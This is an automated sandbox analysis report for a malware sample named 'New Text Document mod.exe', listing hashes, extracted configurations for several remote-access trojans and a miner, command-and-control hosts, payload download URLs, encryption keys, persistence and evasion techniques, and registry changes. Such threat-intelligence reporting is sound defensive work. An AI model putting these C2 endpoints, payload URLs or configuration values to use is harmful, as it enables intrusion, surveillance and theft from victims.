asyncrat | 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-01-2025 04:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

761KB
MD5

c6040234ee8eaedbe618632818c3b1b3
SHA1

68115f8c3394c782aa6ba663ac78695d2b80bf75
SHA256

bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
SHA512

a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
SSDEEP

12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I

Score

10^/10

asyncrat quasar remcos xmrig xred xworm default fuck office04 school backdoor discovery evasion execution macro miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

remcos

Botnet

fuck

republicadominica2025.ip-ddns.com:30202

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
rostad
mouse_option
false
mutex
iwebfiewbfihbewlfkm-WH4782
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

quasar

Version

1.3.0.0

Botnet

School

gamwtonxristo.ddns.net:1717

Mutex

QSR_MUTEX_M3Vba1npfJg3Ale25C

Attributes

encryption_key
VtojWKM7f1XyCVdB41wL
install_name
comctl32.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Defender Startup Scan
subdirectory
Windows Defender

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

0.tcp.in.ngrok.io:14296

193.161.193.99:20466

Mutex

cc827307-beb6-456e-b5dd-e28a204ebd45

Attributes

encryption_key
93486CAE624EBAD6626412E4A7DC6221B139DAA8
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

XukSoXxFQFDQJQvq

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

2.tcp.eu.ngrok.io:19695

Mutex

gonq3XlXWgiz

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/1772-755-0x00000000001B0000-0x00000000001C0000-memory.dmp	family_xworm
behavioral1/files/0x0007000000019263-788.dat	family_xworm

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 10 IoCs

resource	yara_rule
behavioral1/files/0x000c000000018f53-692.dat	family_quasar
behavioral1/memory/2452-694-0x00000000012A0000-0x0000000001326000-memory.dmp	family_quasar
behavioral1/files/0x000600000001903b-702.dat	family_quasar
behavioral1/memory/1280-703-0x0000000001000000-0x0000000001324000-memory.dmp	family_quasar
behavioral1/memory/2124-710-0x00000000002B0000-0x0000000000336000-memory.dmp	family_quasar
behavioral1/memory/2396-725-0x0000000000D40000-0x0000000000DC6000-memory.dmp	family_quasar
behavioral1/memory/2920-746-0x0000000001130000-0x0000000001454000-memory.dmp	family_quasar
behavioral1/files/0x0005000000019356-767.dat	family_quasar
behavioral1/memory/2272-771-0x0000000000980000-0x0000000000CA4000-memory.dmp	family_quasar
behavioral1/memory/1576-781-0x0000000000F80000-0x0000000001006000-memory.dmp	family_quasar

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 796 created 428	796	powershell.EXE	5

Xmrig family
xmrig
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/828-599-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-598-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-605-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-604-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-603-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-602-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-601-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-616-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/828-617-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
796	powershell.EXE
1028	powershell.exe
2204	powershell.exe
1332	powershell.exe
3008	powershell.exe
1320	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Updater.exe
File created	C:\Windows\system32\drivers\etc\hosts	yuksefyj.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
behavioral1/files/0x00060000000173f4-531.dat

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	Loader.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	Loader.exe

Executes dropped EXE 27 IoCs

pid	Process
2228	._cache_New Text Document mod.exe
1984	Synaptics.exe
2232	._cache_Synaptics.exe
2580	NewApp.exe
2476	Updater.exe
1636	yuksefyj.exe
1968	4909_7122.exe
108	fuck.exe
1476	remcos_a2.exe
472	services.exe
2836	Updater.exe
692	4909_7122.exe
1932	Wallet-PrivateKey.Pdf.exe
2648	Pdf%20Reader.exe
2452	ogpayload.exe
1280	Client-base.exe
2124	comctl32.exe
2396	comctl32.exe
2920	Servers.exe
620	mac.exe
1772	Loader.exe
2456	ciscotest.exe
1696	Discord.exe
2272	Windows Defender SmartScreen (32 bit).exe
872	FXServer.exe
1576	comctl32.exe
1076	comctl32.exe

Loads dropped DLL 42 IoCs

pid	Process
2916	New Text Document mod.exe
2916	New Text Document mod.exe
2916	New Text Document mod.exe
1984	Synaptics.exe
1984	Synaptics.exe
2232	._cache_Synaptics.exe
2232	._cache_Synaptics.exe
472	services.exe
1968	4909_7122.exe
1948	WerFault.exe
1948	WerFault.exe
1948	WerFault.exe
1948	WerFault.exe
1740	WerFault.exe
1740	WerFault.exe
1740	WerFault.exe
1740	WerFault.exe
1740	WerFault.exe
1948	WerFault.exe
2452	ogpayload.exe
3032	WerFault.exe
3032	WerFault.exe
3032	WerFault.exe
3032	WerFault.exe
3032	WerFault.exe
1276	WerFault.exe
1276	WerFault.exe
1276	WerFault.exe
1276	WerFault.exe
1276	WerFault.exe
2232	._cache_Synaptics.exe
2232	._cache_Synaptics.exe
1652	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	New Text Document mod.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\NordicVPN = "C:\\Users\\Admin\\Documents\\NordVPNnetworkTAP\\Lang\\RemotePCPrinter.exe"	4909_7122.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

flow	ioc
58	raw.githubusercontent.com
72	0.tcp.in.ngrok.io
153	2.tcp.eu.ngrok.io
17	bitbucket.org
18	bitbucket.org
30	raw.githubusercontent.com
51	pastebin.com
91	2.tcp.eu.ngrok.io
136	0.tcp.in.ngrok.io
19	bitbucket.org
31	raw.githubusercontent.com
50	pastebin.com
59	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	FXServer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	FXServer.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
316	powercfg.exe
1592	powercfg.exe
1684	powercfg.exe
1740	powercfg.exe
276	powercfg.exe
1108	powercfg.exe
2560	powercfg.exe
3032	powercfg.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\System32\System-cb832607b4.exe	FXServer.exe
File created	C:\Windows\SysWOW64\$LMX-cb832607b4.exe	FXServer.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	yuksefyj.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2836 set thread context of 1672	2836	Updater.exe	101
PID 2836 set thread context of 828	2836	Updater.exe	106
PID 872 set thread context of 544	872	FXServer.exe	165
PID 796 set thread context of 1268	796	powershell.EXE	177

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/828-593-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-599-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-598-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-597-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-596-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-595-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-594-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-605-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-604-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-603-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-602-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-601-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-616-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/828-617-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2568	sc.exe
1028	sc.exe
2700	sc.exe
1896	sc.exe
1532	sc.exe
1768	sc.exe
1692	sc.exe
2600	sc.exe
1716	sc.exe
1708	sc.exe
2688	sc.exe
1516	sc.exe
940	sc.exe
2324	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
1948	1932	WerFault.exe	109
1740	2648	WerFault.exe	110
3032	2124	WerFault.exe	120
1276	2396	WerFault.exe	128
1652	1576	WerFault.exe	151
2608	1076	WerFault.exe	166

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ogpayload.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ciscotest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pdf%20Reader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	comctl32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4909_7122.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wallet-PrivateKey.Pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	comctl32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	comctl32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NewApp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	remcos_a2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fuck.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	comctl32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1588	PING.EXE
3064	PING.EXE
1356	PING.EXE
2788	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	FXServer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	FXServer.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0be48829c68db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	._cache_New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	._cache_New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	._cache_New Text Document mod.exe
